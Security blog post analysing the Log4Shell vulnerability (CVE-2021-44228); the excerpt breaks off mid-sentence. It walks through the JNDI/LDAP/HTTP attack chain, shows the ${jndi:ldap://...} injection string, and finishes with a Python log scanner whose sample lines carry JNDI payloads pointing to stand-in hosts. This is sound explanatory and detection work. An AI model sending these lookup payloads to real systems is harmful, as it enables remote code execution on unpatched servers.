API Security Blog

Exploit for Improper Input Validation in Apache Log4J

CVE-2021-44228 Analysis

How does it work?

Below is a detailed walkthrough of a remote injection case that exploits the Log4Shell vulnerability. First, there are 3 parts we need to know:

- Message lookup substitution: Log4j2 allows log messages to include data pulled dynamically from various sources at logging time, and this feature supports JNDI lookups.
- JNDI lookup: allows data to be fetched via the Java Naming and Directory Interface (JNDI) API, which can interact with different directory services.
- LDAP (Lightweight Directory Access Protocol): used primarily for accessing and managing directory information services over a network.

Here is a simple example of remote code execution. The attacker sets up both an LDAP server (reached over the LDAP protocol, holding a reference to malicious Java code) and an HTTP server (where the malicious code itself is stored):

1. Set up an HTTP server in the directory that contains the compiled malicious code: [image]
2. Set up an LDAP server that stores the reference: [image]
3. The attacker sends the malicious input (${jndi:ldap://LDAPSERVER IP:PORT/code}) to a software system that has Log4j2 installed.
4. Log4j2 uses the lookup feature to send a request to the LDAP server.
5. The LDAP server redirects the request to the HTTP server via the Java code reference stored in the LDAP server.
6. The HTTP server sends the malicious code back to the software system, and the software system then executes it.

Malicious code: [image]

Execution of the malicious code succeeded: [image]

IMPORTANT: It is not that we can only use an LDAP server to do…
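As an added defensive example (not code from the original post), the following Python scans log lines for the ${jndi:...} lookup string described above and extracts the scheme, host, port and path of each hit, so a defender can spot injection attempts in access logs. It matches any JNDI URL scheme rather than only ldap, since the post notes LDAP is not the only option; the sample log lines are constructed and use documentation-range addresses.

```python
import re
from typing import Dict, List

# Plain-form Log4j lookup as shown in the walkthrough: ${jndi:<scheme>://host[:port][/path]}.
# Obfuscated variants (nested lookups, split keywords) are deliberately not covered here.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z][a-z0-9+.-]*)://"
    r"(?P<host>[^:/\s}]+)"
    r"(?::(?P<port>\d{1,5}))?"
    r"(?P<path>/[^\s}]*)?"
    r"\}",
    re.IGNORECASE,
)

def find_jndi_lookups(line: str) -> List[Dict[str, str]]:
    """Return one dict per JNDI lookup string found in a single log line."""
    hits = []
    for m in JNDI_LOOKUP.finditer(line):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": m.group("port") or "",
            "path": m.group("path") or "",
            "raw": m.group(0),
        })
    return hits

def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan many log lines; each hit records the 1-based line number it came from."""
    results = []
    for lineno, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            hit["line"] = str(lineno)
            results.append(hit)
    return results

# Constructed sample access log (not real traffic); 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/code}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=${jndi:rmi://198.51.100.11/obj} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['host']}:{hit['port'] or '?'}{hit['path']}")
```

The user-agent and query-string fields are where such strings most often land, but any logged field can carry one, so run the scan over whole lines rather than selected fields.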
